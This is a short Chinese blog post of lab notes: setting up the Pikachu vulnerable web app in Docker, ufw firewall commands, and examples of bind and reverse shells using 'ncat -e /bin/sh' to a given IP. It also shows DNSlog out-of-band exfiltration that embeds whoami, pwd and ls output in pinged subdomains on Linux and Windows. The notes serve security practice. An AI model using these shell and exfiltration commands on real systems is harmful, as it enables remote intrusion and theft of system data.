Administrator
发布于 2026-04-18 / 11 阅读
0
0

liunx反弹shell

使用docker搭建pikache靶场(自己服务器真实环境)

查找pikachu容器名 docker search pikache 建立连接时大概率会超时

使用docker下载容器 docker pull vulfocus/pikachu

启动docker run -p 8088:80 -d vulfocus/pikachu

防火墙设置命令

临时关闭 ufw disuble

启动 ufw enable

重启 ufw reload

指定开放端口 ufw allow 22 或 ufw allow 22/tcp

关闭端口 ufw delete allow 21

查看防火墙状态 ufw status

通过netcat或ncat反向/正向shell

正向

目标 ncat -e /bin/sh -lvvp 8000

攻击者 netcat 82.156.242.28 8000 (ip为目标ip)

反向(攻击者先监听端口后目标进行连接)

目标 ncat -e /bin/sh 82.156.242.28 9005 (目标ip和端口,此ip端口为内网穿透,映射主机端口: 192.168.106.129:8005)

攻击者 ncat -lvvp 8005

带外查询(rce无回显时)

使用DNSlog网站http://www.dnslog.cn/

使用ping命令ping他给的地址 k8z2c7.dnslog.cn

liunx

a=$(pwd | tr '/' '0') 将执行结果中的/替换成0

a=$(ls | tr '.-' '00') 将执行结果中的.-替换成00

ping -c 4 `whoami`.k8z2c7.dnslog.cn (ping4次)

a=$(pwd | tr '/' '0') | ping -c 4 $a.k8z2c7.dnslog.cn

a=$(ls | tr '. -' '000' | tr '\n' '9') | ping -c 4 $a.k8z2c7.dnslog.cn

windows

因cmd命令不支持变量存储,因此调用powershell命令窗口

$a.replace('\','0')将变量a中的'\'替换'0'

powershell;$a=whoami;$a=$a.replace('\','0');$y='.m4o1uw.dnslog.cn';$x=$a+$y;ping $x


评论